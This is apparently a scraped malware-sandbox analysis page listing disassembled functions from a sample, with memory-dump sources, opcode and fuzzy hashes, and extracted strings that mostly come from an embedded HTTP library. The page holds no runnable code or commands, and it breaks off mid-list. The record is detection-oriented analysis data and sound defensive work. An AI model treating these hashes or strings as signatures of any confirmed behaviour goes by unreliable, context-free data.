                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                          • API String ID: 0-1914377741
                                                          • Opcode ID: 9c33929b2397f5751d9c6193524469b3b9192bb881ffc3ec1e9493a6888c899a
                                                          • Instruction ID: bf16befa55dd0ea0460e449689fac51975ccae85526d7ba32e7b85a84da21ec5
                                                          • Opcode Fuzzy Hash: 9c33929b2397f5751d9c6193524469b3b9192bb881ffc3ec1e9493a6888c899a
                                                          • Instruction Fuzzy Hash: 19720870608B459BE7218A28C4457A6B7D2FF91344F08C62CDD8DDB29BEBF6D884C791
                                                          Function 0091EF90 Relevance: 10.7, Strings: 8, Instructions: 688COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $.$;$?$?$xn--$xn--$s
                                                          • API String ID: 0-2939994065
                                                          • Opcode ID: fd97a1a6e667bb9d471778ffc1123ca050cade3b1de2b2f627eb9950f208edeb
                                                          • Instruction ID: d86cc266e4c6d0049f2d1bf68e143ed0d25de80fd8e6ddcb85f26e05d2235e3b
                                                          • Opcode Fuzzy Hash: fd97a1a6e667bb9d471778ffc1123ca050cade3b1de2b2f627eb9950f208edeb
                                                          • Instruction Fuzzy Hash: 382216B2B0430D9BEB209A249C61BAB76D9AFD4348F04493CF85A93293F735D985C752
                                                          Function 00865DB0 Relevance: 10.1, Strings: 8, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                                          • API String ID: 0-3476178709
                                                          • Opcode ID: d00b4fd08deda5f36b32fa912a25d1a598a74c6fd4fc103c614c1c436b3b5348
                                                          • Instruction ID: f0b519acbfc1fc1218d95b3837dc68d7df7f29ea190a376d72fda1d61a9fb271
                                                          • Opcode Fuzzy Hash: d00b4fd08deda5f36b32fa912a25d1a598a74c6fd4fc103c614c1c436b3b5348
                                                          • Instruction Fuzzy Hash: 3A31D672754A496AFB2C004DDC46F3E105BD3C4B14F7BC23EBA0ADB2C5D8E59E0882A5
                                                          Function 0085A960 Relevance: 9.0, Strings: 6, Instructions: 1493COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                          • API String ID: 0-2555271450
                                                          • Opcode ID: 176e90a949e45dd2913037293d8913fa0cb516ba77c0211b6449376575e874be
                                                          • Instruction ID: d72e200a23342ae4f90242d577f490651dbf55a47d788dfb34bd80bae550797e
                                                          • Opcode Fuzzy Hash: 176e90a949e45dd2913037293d8913fa0cb516ba77c0211b6449376575e874be
                                                          • Instruction Fuzzy Hash: 15C269316087458FCB18CF28C49066AB7E2FFE8355F158A2DE899DB351D770ED498B82
                                                          Function 0085E620 Relevance: 8.5, Strings: 6, Instructions: 1028COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                          • API String ID: 0-2555271450
                                                          • Opcode ID: 5de659b4a1d4ed92a3b23b60298ac0b2eb4edf6dfdc23b7a4a6a29c509ca974e
                                                          • Instruction ID: ff62e9b1fe9c2e7c56eeab46f53a44d979aa72ff03d8de48faf2bdb0a10a3b20
                                                          • Opcode Fuzzy Hash: 5de659b4a1d4ed92a3b23b60298ac0b2eb4edf6dfdc23b7a4a6a29c509ca974e
                                                          • Instruction Fuzzy Hash: 17827D71A083019FD714CE29C88172BBBE1FBC5365F188A6DF9A9D7292D730DD098B52
                                                          Function 008B6210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: default$login$macdef$machine$netrc.c$password
                                                          • API String ID: 0-1043775505
                                                          • Opcode ID: ddc44125e879b35f7e4af8ece6c8d283ff44e5b40668c5a10e9e9b1dc815e367
                                                          • Instruction ID: 5dbbf021c8e59275c7ddeeacf113ed817e8702fde6b6b89e8d479b559c8034a4
                                                          • Opcode Fuzzy Hash: ddc44125e879b35f7e4af8ece6c8d283ff44e5b40668c5a10e9e9b1dc815e367
                                                          • Instruction Fuzzy Hash: D9E1D470908341ABE7219E1498857AB7BD4FF95708F18442CF885D7382F7BD9968C7A3
                                                          Function 008BA7F0 Relevance: 6.9, Strings: 5, Instructions: 687COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                                          • API String ID: 0-4201740241
                                                          • Opcode ID: 5b747c21ee2cbbaea7318d71ec34746f407d5a2285e283479b8013ad699883ef
                                                          • Instruction ID: 61a59090650f385ddb2cf627e2a8c3748d42961ae68fe7d10cb45bb3c232604c
                                                          • Opcode Fuzzy Hash: 5b747c21ee2cbbaea7318d71ec34746f407d5a2285e283479b8013ad699883ef
                                                          • Instruction Fuzzy Hash: 0E62C0B0914741DBD714CF24C4907AAB7E4FF98304F04962EE88D8B352E7B5EA94CB96
                                                          Function 00BD3A70 Relevance: 6.8, Strings: 5, Instructions: 517COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                                          • API String ID: 0-2839762339
                                                          • Opcode ID: 3941d8a3065175bce2ff8a363caffc6581deca8c9bca4c28424156a3e9f2ffdf
                                                          • Instruction ID: 9a6da581683bd8a25a3ee1f40f32867812eae6b384cae46cc76e9b7b0184bad9
                                                          • Opcode Fuzzy Hash: 3941d8a3065175bce2ff8a363caffc6581deca8c9bca4c28424156a3e9f2ffdf
                                                          • Instruction Fuzzy Hash: 9A02B5B16043419FD7259F249881B6BFBD5EF55700F0888BEE98997382FB71E904C792
                                                          Function 00BDE030 Relevance: 5.8, Strings: 3, Instructions: 2082COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $d$nil)
                                                          • API String ID: 0-394766432
                                                          • Opcode ID: a8fd96a9486318dc6c20e8cf60b9bd05880dff55e43de9a1ce20cf283a7f5825
                                                          • Instruction ID: 35dd7ccb8b2d402ec8e91a95a636fab2b8f40354e0fa0ffcb0c314f36441200f
                                                          • Opcode Fuzzy Hash: a8fd96a9486318dc6c20e8cf60b9bd05880dff55e43de9a1ce20cf283a7f5825
                                                          • Instruction Fuzzy Hash: A2134A746083428FD720DF29C08062AFBE1FF99754F2449AEE9959B361E771EC45CB82
                                                          Function 00918F90 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 256COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUnicastIpAddressTable.IPHLPAPI(?,?), ref: 00918FE6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: AddressTableUnicast
                                                          • String ID: 127.0.0.1$::1
                                                          • API String ID: 2844252683-3302937015
                                                          • Opcode ID: 2c55cb3c01b9bed6aca16ac1fb06c3c4490ddf047f2b787dc31d9a79edadf0b7
                                                          • Instruction ID: 15a86db5def99f6a42358418b1a0ee5efa95f936eff538571f8e374e5219a903
                                                          • Opcode Fuzzy Hash: 2c55cb3c01b9bed6aca16ac1fb06c3c4490ddf047f2b787dc31d9a79edadf0b7
                                                          • Instruction Fuzzy Hash: 0DA1E5B1E08346ABE700DF24C85576AB3E4BF95304F159A29F8888B261F775EDD0C792
                                                          Function 0090C900 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                                          • API String ID: 0-3285806060
                                                          • Opcode ID: 3721ce5bf16956a327b0865bc19e07480d9f840e962a692df301c4da428c6b16
                                                          • Instruction ID: e208cd3f931a1417c08ec44ebb0bda4b14e2289b854baeda440c407196fe1d24
                                                          • Opcode Fuzzy Hash: 3721ce5bf16956a327b0865bc19e07480d9f840e962a692df301c4da428c6b16
                                                          • Instruction Fuzzy Hash: CFD1F3F2A083068FD7249F28D88136ABBD5AF91705F148B3DF8D9972C1EB749944D782
                                                          Function 00BDCC70 Relevance: 5.4, Strings: 4, Instructions: 351COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
